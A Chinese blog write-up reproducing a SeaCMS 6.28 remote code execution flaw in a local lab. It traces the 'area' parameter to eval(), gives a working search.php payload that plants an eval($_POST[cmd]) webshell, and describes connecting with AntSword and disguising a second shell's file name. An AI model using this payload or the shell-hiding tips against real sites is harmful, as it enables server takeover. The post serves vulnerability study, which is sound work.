【漏洞复现】海洋CMS6.28远程代码执行
【漏洞复现】海洋CMS6.28远程代码执行
文章目录
- 【漏洞复现】海洋CMS6.28远程代码执行
- 一、漏洞背景
- 二、漏洞原理
- 三、漏洞复现
一、漏洞背景
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。
该CMS6.28版本存在命令执行漏洞,攻击者可以通过远程命令执行入侵被攻击者主机。
二、漏洞原理
area参数处理过的地方经过字符是否非法判断之后,调用echoSearchPage()函数
area参数经过了检测是否是拼音之后
接下来到了
$content=$mainClassObj->parseSearchItemList($content,"area");
因为能执行php代码一般就是eval()函数
搜索一下这个页面有eval函数的地方
for($m=0;$m<$arlen;$m++){ $strIf=$iar[1][$m]; $strIf=$this->parseStrIf($strIf);
$strThen=$iar[2][$m];
$strThen=$this->parseSubIf($strThen);if (strpos($strThen,$labelRule2)===false){if (strpos($strThen,$labelRule3)>=0){$elsearray=explode($labelRule3,$strThen);
$strThen1=$elsearray[0];
$strElse1=$elsearray[1];@eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}}else{@eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}}
可以在这里下个断点,把变量打印出来
就可以清晰的看到就是在这执行了我们的命令
漏洞最终payload:/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
三、漏洞复现
本地IIS搭建CMS
构造payload:
先来个phpinfo
http://192.168.1.14:8452/search.php?searchtype=5&tid=&area=phpinfo()
代码执行成功
ok
继续一句话木马
http://192.168.1.14:8452/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
直接蚁剑链接,连接密码cmd
连接数据库
尝试蚁剑拿shell
无回显
到这儿就结束了吗?
不!再战
用蚁剑写个冰蝎的马试试
名字伪装一下,都懂的admin…config…ini…
尝试连接
shell还是不行
草草结束。
【漏洞复现】海洋CMS6.28远程代码执行相关推荐
- 【漏洞复现】CNVD-2022-10270向日葵远程代码执行
声明:本文内容仅供学习参考 目录 声明:本文内容仅供学习参考 一.漏洞介绍 二.影响范围 三.漏洞复现 复现思路一: 复现思路二: 一.漏洞介绍 向日葵远程控制是上海贝锐信息科技股份有限公司开发的一款 ...
- 【漏洞复现】IE 浏览器远程代码执行漏洞(CVE-2018-8174)
一.CVE-2018-8174(本质是 Windows VBScript Engine 代码执行漏洞) 由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶 ...
- 【漏洞复现】IE 浏览器远程代码执行漏洞
Windows VBScript Engine 代码执行漏洞(CVE-2018-8174) 在2018年5月9日的时候360发表了一份apt攻击分析及溯源报告 文中提到了cve-2018-8174这个 ...
- [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- 9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616)、远程代码执行漏洞(CVE-2017-12615
9 月 19 日,腾讯云安全中心监测到 Apache Tomcat 修复了2个严重级别的漏洞, 分别为: 信息泄露漏洞(CVE-2017-12616).远程代码执行漏洞(CVE-2017-12615 ...
- rmi远程代码执行漏洞_【漏洞通告】Apache Solr远程代码执行漏洞
1.综述 Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器.该产品支持层面搜索.垂直搜索.高亮显示搜索结果等. Apache Solr ...
- layuiajax提交表单控制层代码_漏洞预警|ThinkPHP 5.0 远程代码执行
漏洞预警|ThinkPHP 5.0 远程代码执行 2019-01-11 事件来源 2019年1月11日,ThinkPHP Github仓库发布了新的版本v5.0.24,包含重要的安全更新,山石安服团队 ...
- 【高危漏洞通告】Spring Framework 远程代码执行 (CVE-2022-22965)
[高危漏洞通告]Spring Framework 远程代码执行 (CVE-2022-22965)漏洞通告 一. 漏洞情况 Spring 框架(Framework)是一个开源的轻量级 J2EE 应 ...
- 复现CVE-2022-10270(向日葵远程代码执行漏洞)
目录 引言 漏洞描述 影响版本: 原理: 环境搭建 手动复现 脚本复现 修复建议 引言 本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔者不提供担保!!! 漏洞描述 向日葵是一款免费的,集远程 ...
- oracle11g远程命令执行漏洞,漏洞应急|Oracle Weblogic Server远程代码执行漏洞(CVE-2021-2109)...
近日,锐捷网络CERT安全应急响应团队关注到Oracle官方发布了2021年1月关键补丁更新公告,该补丁中修补了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多 ...
最新文章
- C#让程序只运行一次实例
- Intellij Idea:导入Gradle项目 - 尚未定义JAVA_HOME
- PHP常用功能块_错误和异常处理 — php(32)
- Spring+Hibernate的典型配置
- 那些生活中的应该知道的知识
- Linux 定时任务crontab_014
- 技术真的就不是那么重要了
- 【git体验】git基础-3目录之间关系
- 酷派+k1+rom+android+4.4,酷派k1刷机教程
- Word域代码公式交叉引用
- 应用comsol模拟水力压裂应力分布
- 如何简单快速的写出幸运转盘抽奖
- 解决火狐浏览器中文乱码问题
- 天下武功唯快不破--速度要快
- ubuntu14.04 desktop 32-bit kvm装windows xp
- 怎么去除视频字幕清理视频字幕或水印的几种方法
- 计算机无法检测更新失败怎么办,Windows更新错误解决方案
- design/sourcecode/课堂笔记designPrinciples
- (附源码)springboot家庭财务分析系统 毕业设计641323
- 六、Docker安装Redis